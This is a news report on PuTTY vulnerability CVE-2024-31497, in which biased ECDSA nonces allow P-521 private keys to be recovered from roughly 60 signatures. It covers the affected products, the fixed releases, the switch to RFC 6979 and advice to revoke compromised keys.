In a recent advisory, the maintainers of the PuTTY Secure Shell (SSH) and Telnet client have alerted users about a critical vulnerability that could lead to the full recovery of NIST P-521 (ecdsa-sha2-nistp521) private keys. This flaw, assigned the CVE identifier CVE-2024-31497, was discovered by researchers Fabian Bäumer and Marcus Brinkmann from the Ruhr University Bochum.

The PuTTY project warns that the vulnerability allows attackers with a few dozen signed messages and the public key to extract the private key. This would enable them to forge signatures as if they were the legitimate user, potentially gaining unauthorized access to any servers using the compromised key.

However, obtaining the necessary signatures poses a challenge for attackers as they would need to compromise the server associated with the key. This limits the potential attack surface, making it more difficult for malicious actors to exploit the vulnerability.

Fabian Bäumer provided insight into the flaw, explaining that it originates from the generation of biased ECDSA cryptographic nonces. Specifically, the first 9 bits of each ECDSA nonce are zero, providing an avenue for the recovery of the private key. Bäumer emphasized that state-of-the-art techniques can achieve full secret key recovery in approximately 60 signatures.

The impact of this vulnerability extends beyond PuTTY, affecting other products that incorporate versions 0.68 through 0.80 of the software. In response to responsible disclosure, the issue has been addressed in PuTTY 0.81, FileZilla 3.67.0, WinSCP 6.3.3, and TortoiseGit 2.15.0.1. Users of TortoiseSVN are advised to use Plink from the latest PuTTY 0.81 release when accessing an SVN repository via SSH until a patch is available.

The fix involves switching to the RFC 6979 technique for all DSA and ECDSA key types, abandoning the previous method of deriving nonces deterministically. While this earlier method avoided the need for a source of high-quality randomness, it was susceptible to biased nonces when using P-521.

In light of the vulnerability, it is crucial for users to consider NIST-P521 keys compromised and take immediate action to revoke them. This involves removing the keys from the ~/.ssh/authorized_keys files and equivalent locations in other SSH servers.

The PuTTY project urges all users to update to the latest version (0.81) or switch to alternative software implementations to ensure their private key security. By addressing this critical vulnerability, users can mitigate the risk of unauthorized access and maintain the integrity of their SSH connections.